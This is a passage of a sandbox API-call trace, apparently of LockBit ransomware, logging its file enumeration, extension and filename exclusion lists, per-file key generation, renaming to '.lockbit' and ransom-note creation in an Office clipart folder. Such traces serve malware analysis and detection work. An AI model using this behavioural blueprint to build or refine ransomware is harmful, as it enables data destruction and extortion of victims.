lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.243] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0290548.WMF") returned 1 [0155.244] lstrcmpiW (lpString1="ntldr", lpString2="J0290548.WMF") returned 1 [0155.244] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0290548.WMF") returned 1 [0155.244] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0290548.WMF") returned -1 [0155.244] lstrcmpiW (lpString1="autorun.inf", lpString2="J0290548.WMF") returned -1 [0155.244] lstrcmpiW (lpString1="thumbs.db", lpString2="J0290548.WMF") returned 1 [0155.244] lstrcmpiW (lpString1="iconcache.db", lpString2="J0290548.WMF") returned -1 [0155.244] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.244] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0290548.WMF") returned=".WMF" [0155.244] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.244] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.244] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.245] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.245] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0290548.WMF.lockbit") returned 72 [0155.246] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0290548.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0290548.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0155.247] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.247] malloc (_Size=0x40068) returned 0x3f70048 [0155.247] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=40586) returned 1 [0155.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0155.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0155.248] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0155.278] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0290548.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0290548.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.278] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.278] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.279] free (_Block=0x1fa2ed8) [0155.280] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0290548.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.280] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.280] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.280] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2590, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0291794.WMF", cAlternateFileName="")) returned 1 [0155.280] lstrcmpiW (lpString1=".", lpString2="J0291794.WMF") returned -1 [0155.281] lstrcmpiW (lpString1="..", lpString2="J0291794.WMF") returned -1 [0155.281] PathFindExtensionW (pszPath="J0291794.WMF") returned=".WMF" [0155.281] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.281] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.282] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.282] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0291794.WMF") returned 1 [0155.282] lstrcmpiW (lpString1="ntldr", lpString2="J0291794.WMF") returned 1 [0155.282] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0291794.WMF") returned 1 [0155.282] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0291794.WMF") returned -1 [0155.282] lstrcmpiW (lpString1="autorun.inf", lpString2="J0291794.WMF") returned -1 [0155.282] lstrcmpiW (lpString1="thumbs.db", lpString2="J0291794.WMF") returned 1 [0155.282] lstrcmpiW (lpString1="iconcache.db", lpString2="J0291794.WMF") returned -1 [0155.282] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.283] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0291794.WMF") returned=".WMF" [0155.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.283] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.283] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.284] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.284] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0291794.WMF.lockbit") returned 72 [0155.284] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0291794.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0291794.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0155.285] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.285] malloc (_Size=0x40068) returned 0x3df0008 [0155.285] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9616) returned 1 [0155.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.285] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0155.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0155.286] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0155.291] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0291794.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0291794.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.291] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.291] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.293] free (_Block=0x1fa2ed8) [0155.293] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0291794.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.293] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.293] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.293] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5668dad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x20e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0292248.WMF", cAlternateFileName="")) returned 1 [0155.293] lstrcmpiW (lpString1=".", lpString2="J0292248.WMF") returned -1 [0155.293] lstrcmpiW (lpString1="..", lpString2="J0292248.WMF") returned -1 [0155.293] PathFindExtensionW (pszPath="J0292248.WMF") returned=".WMF" [0155.293] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.293] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.294] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.294] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0292248.WMF") returned 1 [0155.295] lstrcmpiW (lpString1="ntldr", lpString2="J0292248.WMF") returned 1 [0155.295] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0292248.WMF") returned 1 [0155.295] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0292248.WMF") returned -1 [0155.295] lstrcmpiW (lpString1="autorun.inf", lpString2="J0292248.WMF") returned -1 [0155.295] lstrcmpiW (lpString1="thumbs.db", lpString2="J0292248.WMF") returned 1 [0155.295] lstrcmpiW (lpString1="iconcache.db", lpString2="J0292248.WMF") returned -1 [0155.295] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.295] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292248.WMF") returned=".WMF" [0155.295] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.295] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0155.295] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.296] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.296] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292248.WMF.lockbit") returned 72 [0155.296] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292248.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292248.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0155.304] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.304] malloc (_Size=0x40068) returned 0x1ff1e60 [0155.304] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8420) returned 1 [0155.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0155.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0155.306] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0155.327] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292248.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program 